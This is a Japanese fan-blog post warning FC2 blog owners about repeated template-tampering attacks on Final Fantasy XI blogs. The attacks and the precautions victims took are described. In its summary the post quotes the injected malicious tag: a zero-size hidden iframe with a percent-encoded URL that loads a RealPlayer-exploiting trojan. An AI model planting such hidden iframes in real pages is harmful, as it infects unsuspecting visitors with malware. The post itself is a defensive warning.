こんにちわ、
第七猫です(´・ω・`)
のっけから
しょぼーんな感じです。またまた嫌な報告ですが先週、当ブログと
同じく
テンプレート改竄を受けたブログ様が、今週
2度目の改竄を受けたとの
ご報告を頂きました…
もうね…(´;ω;`)ブワッ
FFXI:戦士スキーのブログさん(テンプレート改竄事件再び。)
→ ttp://ffxiwar.blog91.fc2.com/blog-entry-221.html
3/11の14時時点で怪しげなインラインフレームは削除され
対策済みと
いう事ですが、二日程非公開状態が続いていたみたいです。
また同じく
テンプレート改竄の被害に遭いました
「某青魔道士のFF11雑記」様も
現在コメントは特に出ておりませんが
非公開モードになっております。
タイミングが重なっているのでとても気になる所です(´・ω・`)
−−−−−−−−−−−−3/12追記−−−−−−−−−−−−すいません、
「某青魔道士のFF11雑記」様のコメントが以下にありました。
→ ttp://www16.ocn.ne.jp/~ff11blue/index.html
簡単に内容を書きますと…
どうやら「某青魔道士のFF11雑記」様でも
再びテンプレ改竄が
発生したそうです。
((((゚Д゚;))))ガクガクプルプル
3/9(日)の事らしいのですが、R-Typeさんと
ほぼ同じタイミングみたいです。
更に驚くべきは…
>?PC2台を使用し、ID/Passを使用した作業を行うPCと他作業(ネットサーフィン)を
>行うPCを完全に分離。
>?両PCのOSをクリーンインストール。
>?ID/Pass入力時はもう一方のPCは回線を切断する。以上の対策を取っていらっしゃったみたいですが、これでも効果は現れず
2度目の改竄が見られたとか…ヽ(´Д`;)ノアゥア...
該当の指定URLは伏せられていましたが、
16進表記でサーバーは
カナダ。
もうね…管理者云々の
問題では無い気がしてきますね…(´;ω;`)ブワッ
管理出来るって
レベルじゃねーぞッ!って感じです…
これどうすれば良いの?って思っちゃいますよね(汗
管理者の皆様…あの…え〜っと…
気をつけてください?(´;ω;`)
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−概略を以下に↓
2度目の被害にあったFFXI:戦士スキーのブログさんのご報告より。
●前回同様、意図しないインラインフレームがテンプレートに追加(3/9昼過ぎ)
−−−−−−−以下コメント抜擢−−−−−−−
検出済み: Exploit-RealPlay (トロイの木馬)
−−−−−−−−−−−−−−−−−−−−−−
↓
●ブログをプライベートモードへ移行、テンプレ内を検索したところ
< iframe src=http://%77%77%77%2E%68%65%6C%6C%68%2E%
6E%65%74 width=0 height=0>< /iframe>
というタグを発見。
↓
●これをデコードしてみると www■hellh■net というところで
前回同様サーバー所在地は香港
↓
●怪しげなインラインフレーム2、スクリプト1という結果でした。
前回同様 www■cnzz■com に繋がりがあり、こちらはサーバー所在地中国。
hellh.の方は登録日が2008.03.08とか超あたらしい(最近登録された物)という流れらしいです((((゚Д゚;))))ガクガクプルプル
もうね…なんと言ったら良いのか…(´・ω・`)
検出結果を見る限りでは、前回同様
RealPlayerの脆弱性を利用するトロイ?
現時点で不明な点。
?パスワード変更後、たった6日で再び改竄発生。
?なぜ犯人は管理パスワードの変更をしないのか?以上の点。
まずは?ですが、
FFXI:戦士スキーのブログ:管理人さんのR-Typeさんも
仰ってる通り、今月初めの1回目で
パスワードは変更済み。そして可能な限り
ウイルスチェックを行った結果
問題無しというこの状況において…
簡単に
再びこういう事が起きるという事(´・ω・`)
パスワードはかなり長く管理者でさえ
覚え難い物だったらしいのですが、
それでも効果が現れず。そして管理者の使っているPCからは各社のチェックで
問題無しとの事。
そして?。
もし仮にそれぞれのブログさんの
FC2IDが本当に
漏洩しているとすると
なぜ犯人は
管理パスワードの変更をしないのでしょう?
最悪の事態を考えますと…
犯人が手に入れたFC2IDとパスを使い、
罠を仕掛けてパスワードを変更さえ
してしまえば、本来の管理人すら
修正、管理できない状況になる。という事。
つまりはFC2からの強制的なブログ公開を禁止されるまで、
罠を張る事が出来る。
ここまで来るとどういった
対策を取れば良いのか?どうすれば
再発防止に
繋がるのかがまったく
見当すらつかず…(;´д`)ゞ
今現在、当ブログからは新たな罠は見つかっておりませんが皆様も十分
ご注意してください。・゜・(/Д`)・゜・。
必ず
インラインフレーム機能はオフしておいて下さい!
前回の報告では
3〜4日の検出誤差があった事から、ここ2〜3日は私も特に
警戒してみておきますが、どうしても間に合わない可能性もあります。
何かしらの異常が見られた場合は、
至急ウイルスチェックをお願い致します。
特にBA(←VU)最中、ワクテカで色々なブログ様へ
足を伸ばす機会が多い時期です!
十分に注意くださるよう、お願い申し上げます。
本日にも
URL付きの罠コメントも2個ほど付きました。
日本語が
意味不明杉てアホかと…ヽ(´Д`)ノ
ちなみに以前にご紹介した
Dr.WEBで、上記アドレスを調べてみた所…
ちゃんと
NG判定が出ました。(まぁ悲しい事ですが…)
一応、
ソースチェッカー様でも調べてみましたが、明らかに
黒確定。
速攻削除しましたが、コメントも
頻繁に付くようですので大変
不本意ながら
コメント・トラックバックを
承認制とさせて貰います(´・ω・`)
折角コメントやトラバを頂けるのに、
承認待ちとかやりたくなかったのですが…
事が事だけにこうせざるを得ないかなぁと。
なるべく早めに
コメント確認しますのでご了承願います。
色々ゴチャゴチャ書きましたが、はっきり言って現時点で確約の取れる対応が
まったく無い状況です。
大変申し訳ありませんが、見に来て頂けた皆様。お手数ですが
可能な限りの自衛
手段を実施して頂くよう、重ねてお願い申し上げます。
他MMOの前例を見ましても、FC2だけに留まらない危険は
かなり高いです。
現時点では…
ウイルスチェック
異常無し判定の管理者が、
想定し難いパスワードを設定した状態でも、
テンプレートが改竄される可能性がある。
としか言い様が有りません…ヽ(´Д`;)ノアゥア...
正直
管理出来る枠を超えています、こうなるとかなりお手上げの状態です。
ちなみに前回の騒動以来、第七猫は
RealPlayerをアンインストールしました。
これで何か変わるのか…?分かりませんが、テンプレ改竄される可能性を
1%でも下げれるならと思い削除しました。
もし!FC2IDパスを抜くトロイが存在したら…
もし!そのトロイがRealPlayerの脆弱性を突く物であれば…
もし!そのトロイは現状、チェックで検出できない
新型だった場合は…
多少なりとは効果があるかもしれませんが、まぁ
期待薄かなぁ…(´・ω・`)
他の管理者様はRealPlayerは
インストールされていたのでしょうか?
アンインスコした第七猫ブログでも、
もし再発するようであれば効果無しって
事ですかねぇ…
今後もしこういった被害が
拡大する様であれば、FC2からの
移転もしくは
最悪ブログ自体の
閉鎖も視野に入れて検討しようと思っております(´;ω;`)
自分一人のリスクで何とかなるならまだしも、コレばかりは…
((((゚Д゚;))))ガクガクプルプル
FC2には個人的にも
原因の究明と迅速な対応をメールしてみます。
ちなみに
今後起こりうる可能性のある
罠(ROの前例)↓
−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
・IE系ブラウザを使用している方へ:偽装JPGファイルに注意
実体はHTMLファイルで拡張子をJPGに偽装したファイルが
アップローダに上げられる例が確認されています。・mixiに書き込まれるコメントに要注意!
mixiのアカウントをハックして、日記のコメントとして
垢ハックURLを貼るやり方があるとの情報が入りました。−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
上記のような
罠も過去あったそうです。
偽装JPGファイルなんかもあるそうです。
参考までに。
*そういえばメールで思い出したんですが、スクエアエニックスから
メール来てましたね。第七猫のメーラーではテキスト形式でしか表示を
許可してないので、見てみたらTHMLタグの嵐(笑
まぁ他にも「メール来た」との情報があったので公式の物でほぼ確定ですが
何の情報も無しにアレを開く気にはなれないですよね(苦笑
PR
